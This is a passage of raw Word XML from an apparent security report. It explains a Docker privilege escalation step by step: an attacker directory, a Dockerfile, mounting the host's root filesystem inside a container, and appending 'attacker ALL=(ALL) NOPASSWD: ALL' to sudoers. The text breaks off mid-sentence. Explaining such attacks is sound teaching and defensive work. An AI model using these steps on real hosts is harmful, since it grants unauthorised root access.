      </w:r>
      <w:r>
        <w:t xml:space="preserve"> purpose is </w:t>
      </w:r>
      <w:r w:rsidR="00677B1C">
        <w:t xml:space="preserve">to </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">store and save </w:t>
      </w:r>
      <w:r w:rsidR="00CF2CAF">
        <w:t>the Dockerfile created by the attacker.</w:t>
      </w:r>
      <w:r w:rsidR="00AE0044">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D04A88" w14:textId="18FBB161" w:rsidR="00AE0044" w:rsidRDefault="00AE0044" w:rsidP="00AE0044">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6739B261" wp14:editId="7B50211C">
            <wp:extent cx="3219450" cy="609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19450" cy="609600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD0A451" w14:textId="42B6965D" w:rsidR="00AE0044" w:rsidRDefault="00AE0044" w:rsidP="00AE0044">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="128" w:name="_Toc86858614"/>
      <w:bookmarkStart w:id="129" w:name="_Toc86867504"/>
      <w:r w:rsidRPr="00AE0044">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE0044">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00AE0044">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00AE0044">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A53E61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>23</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE0044">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00AE0044">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: creating file directory </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>for the attacker.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="128"/>
      <w:bookmarkEnd w:id="129"/>
    </w:p>
    <w:p w14:paraId="6A20049D" w14:textId="320DE07C" w:rsidR="002A6FBC" w:rsidRDefault="002A6FBC" w:rsidP="0041050A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The Dockerfile shown in figure </w:t>
      </w:r>
      <w:r w:rsidR="0041050A">
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00B40144">
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is created using </w:t>
      </w:r>
      <w:r w:rsidR="005230C8">
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r>
        <w:t>vim text editor. It is built based on wheezy</w:t>
      </w:r>
      <w:r w:rsidR="005230C8">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> lightweight Linux Debian distribution.</w:t>
      </w:r>
      <w:r w:rsidR="005230C8">
        <w:t xml:space="preserve"> This Dockerfile provides the baseline to create </w:t>
      </w:r>
      <w:r w:rsidR="00B734C6">
        <w:t xml:space="preserve">an </w:t>
      </w:r>
      <w:r w:rsidR="005230C8">
        <w:t>image, enabling the attacker to mount the whole file system automatically.</w:t>
      </w:r>
      <w:r w:rsidR="0059704F">
        <w:t xml:space="preserve"> The ENV variable is used to specify </w:t>
      </w:r>
      <w:r w:rsidR="00ED0735">
        <w:t>where the attacker wants to work. Simply put, it is used as a working directory acting as the mount point for the file system. The RUN command execute</w:t>
      </w:r>
      <w:r w:rsidR="00A22A38">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00ED0735">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00ED0735" w:rsidRPr="00ED0735">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>mkdir</w:t>
      </w:r>
      <w:r w:rsidR="00E74226">
        <w:t xml:space="preserve"> to create </w:t>
      </w:r>
      <w:r w:rsidR="0099797A">
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="00E74226">
        <w:t>directory where the Docker image works within the current or parent directory, in this case, with</w:t>
      </w:r>
      <w:r w:rsidR="00B734C6">
        <w:t>in</w:t>
      </w:r>
      <w:r w:rsidR="00E74226">
        <w:t xml:space="preserve"> the /attacker ENV variable.</w:t>
      </w:r>
      <w:r w:rsidR="0099797A">
        <w:t xml:space="preserve"> Eventually, this Dockerfile allows the attacker inside a container to mount the whole file system</w:t>
      </w:r>
      <w:r w:rsidR="00FC5E2E">
        <w:t xml:space="preserve"> of the Docker host machine</w:t>
      </w:r>
      <w:r w:rsidR="0099797A">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2652C515" w14:textId="7E51C127" w:rsidR="0049257F" w:rsidRDefault="002A6FBC" w:rsidP="002A6FBC">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="571CBEF4" wp14:editId="09AAF3A5">
            <wp:extent cx="3751865" cy="2254250"/>
            <wp:effectExtent l="0" t="0" r="127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752112" cy="2254398"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="216BE88F" w14:textId="4B2F9BCA" w:rsidR="002A6FBC" w:rsidRDefault="002A6FBC" w:rsidP="002A6FBC">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="130" w:name="_Toc86858615"/>
      <w:bookmarkStart w:id="131" w:name="_Toc86867505"/>
      <w:r w:rsidRPr="002A6FBC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="002A6FBC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="002A6FBC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="002A6FBC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A53E61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>24</w:t>
      </w:r>
      <w:r w:rsidRPr="002A6FBC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="002A6FBC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00420F9C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">creating the </w:t>
      </w:r>
      <w:r w:rsidRPr="002A6FBC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Dockerfile.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="130"/>
      <w:bookmarkEnd w:id="131"/>
    </w:p>
    <w:p w14:paraId="77DEBDA9" w14:textId="3096C7D1" w:rsidR="00420F9C" w:rsidRPr="00420F9C" w:rsidRDefault="00320B5F" w:rsidP="00420F9C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>At this stage, the Docker image is ready and is built using the command shown in figure 2</w:t>
      </w:r>
      <w:r w:rsidR="00B40144">
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:t>. The image is tagged as attacker just for simplicity and clarity, but it can also be tagged with different names.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C5E3E8C" w14:textId="0110E5CE" w:rsidR="0099797A" w:rsidRDefault="00420F9C" w:rsidP="00420F9C">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7776C5EF" wp14:editId="09D665ED">
            <wp:extent cx="3816268" cy="28448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17120" cy="2845435"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="004CC5DD" w14:textId="527369A5" w:rsidR="00420F9C" w:rsidRDefault="00420F9C" w:rsidP="00420F9C">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="132" w:name="_Toc86858616"/>
      <w:bookmarkStart w:id="133" w:name="_Toc86867506"/>
      <w:r w:rsidRPr="00420F9C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="00420F9C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00420F9C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00420F9C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A53E61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>25</w:t>
      </w:r>
      <w:r w:rsidRPr="00420F9C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00420F9C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: run the Docker image.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="132"/>
      <w:bookmarkEnd w:id="133"/>
    </w:p>
    <w:p w14:paraId="394E3C82" w14:textId="5A7B0DD7" w:rsidR="006C3230" w:rsidRPr="006C3230" w:rsidRDefault="006C3230" w:rsidP="006C3230">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>A container is then created with the command shown in figure 2</w:t>
      </w:r>
      <w:r w:rsidR="00817E95">
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:t>. The command specifies a volume that allows to mount the</w:t>
      </w:r>
      <w:r w:rsidR="007532D7">
        <w:t xml:space="preserve"> host’s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> root file system and put it </w:t>
      </w:r>
      <w:r w:rsidR="007532D7">
        <w:t>in the working directory defined in figure 2</w:t>
      </w:r>
      <w:r w:rsidR="00817E95">
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="007532D7">
        <w:t>, which is /attacker.</w:t>
      </w:r>
      <w:r w:rsidR="005F2FB2">
        <w:t xml:space="preserve"> Also, the container </w:t>
      </w:r>
      <w:r w:rsidR="002B3C9A">
        <w:t>is defined to run</w:t>
      </w:r>
      <w:r w:rsidR="005F2FB2">
        <w:t xml:space="preserve"> in interactive mode</w:t>
      </w:r>
      <w:r w:rsidR="0049573C">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="005F2FB2">
        <w:t>enabl</w:t>
      </w:r>
      <w:r w:rsidR="0049573C">
        <w:t>ing</w:t>
      </w:r>
      <w:r w:rsidR="005F2FB2">
        <w:t xml:space="preserve"> the attacker to execute bash commands on the container. The </w:t>
      </w:r>
      <w:r w:rsidR="002B3C9A">
        <w:t>output shows that the user has a root privilege within the current Docker instance or container. This means that the attacker has root access to the target’s file system, the Ubuntu laptop.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="654E73B9" w14:textId="6B24FE00" w:rsidR="00320B5F" w:rsidRDefault="006C3230" w:rsidP="007532D7">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="619D80BE" wp14:editId="7A92C1E2">
            <wp:extent cx="4544060" cy="859155"/>
            <wp:effectExtent l="0" t="0" r="889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44060" cy="859155"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="05312C6E" w14:textId="5BE2A133" w:rsidR="007532D7" w:rsidRDefault="007532D7" w:rsidP="007532D7">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="134" w:name="_Toc86858617"/>
      <w:bookmarkStart w:id="135" w:name="_Toc86867507"/>
      <w:r w:rsidRPr="007532D7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="007532D7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="007532D7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="007532D7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A53E61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>26</w:t>
      </w:r>
      <w:r w:rsidRPr="007532D7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="007532D7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="005F2FB2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>A container with volume mounted, giving shell access.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="134"/>
      <w:bookmarkEnd w:id="135"/>
    </w:p>
    <w:p w14:paraId="2300835E" w14:textId="429CC874" w:rsidR="0049573C" w:rsidRPr="0049573C" w:rsidRDefault="00A1331B" w:rsidP="00C110E4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="0049573C">
        <w:t xml:space="preserve">he attacker can run root commands within the container and thus edit the sudoers </w:t>
      </w:r>
      <w:r w:rsidR="005B46CB">
        <w:t>file system on the Ubuntu laptop, as shown in figure 2</w:t>
      </w:r>
      <w:r w:rsidR="00817E95">
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidR="005B46CB">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00C110E4">
        <w:t xml:space="preserve"> However,</w:t>
      </w:r>
      <w:r w:rsidR="005B46CB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C110E4">
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidR="005B46CB">
        <w:t xml:space="preserve">he attacker cannot run vim or nano </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">text </w:t>
      </w:r>
      <w:r w:rsidR="005B46CB">
        <w:t xml:space="preserve">editors </w:t>
      </w:r>
      <w:r w:rsidR="00C110E4">
        <w:t>as</w:t>
      </w:r>
      <w:r w:rsidR="005B46CB">
        <w:t xml:space="preserve"> they are not installed on the container</w:t>
      </w:r>
      <w:r w:rsidR="00C110E4">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E303ED9" w14:textId="7FA9C3F4" w:rsidR="0049573C" w:rsidRDefault="0049573C" w:rsidP="0049573C">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="013F348B" wp14:editId="718454A2">
            <wp:extent cx="3657600" cy="267005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663264" cy="2674189"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3149CB06" w14:textId="1AA960AE" w:rsidR="00C110E4" w:rsidRDefault="005B46CB" w:rsidP="00C110E4">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="136" w:name="_Toc86858618"/>
      <w:bookmarkStart w:id="137" w:name="_Toc86867508"/>
      <w:r w:rsidRPr="005B46CB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="005B46CB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="005B46CB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="005B46CB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A53E61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>27</w:t>
      </w:r>
      <w:r w:rsidRPr="005B46CB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="005B46CB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: access to the host’s sudoers file system</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="136"/>
      <w:bookmarkEnd w:id="137"/>
    </w:p>
    <w:p w14:paraId="18A43F4C" w14:textId="391AEA0D" w:rsidR="00C110E4" w:rsidRPr="00C110E4" w:rsidRDefault="00A1331B" w:rsidP="00A1331B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>However, the attacker can echo and append the syntax to the sudoers files using the commands given in figure 2</w:t>
      </w:r>
      <w:r w:rsidR="00817E95">
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. The syntax “attacker ALL=(ALL) NOPASSWD: ALL” permits the </w:t>
      </w:r>
      <w:r w:rsidR="003C4F66">
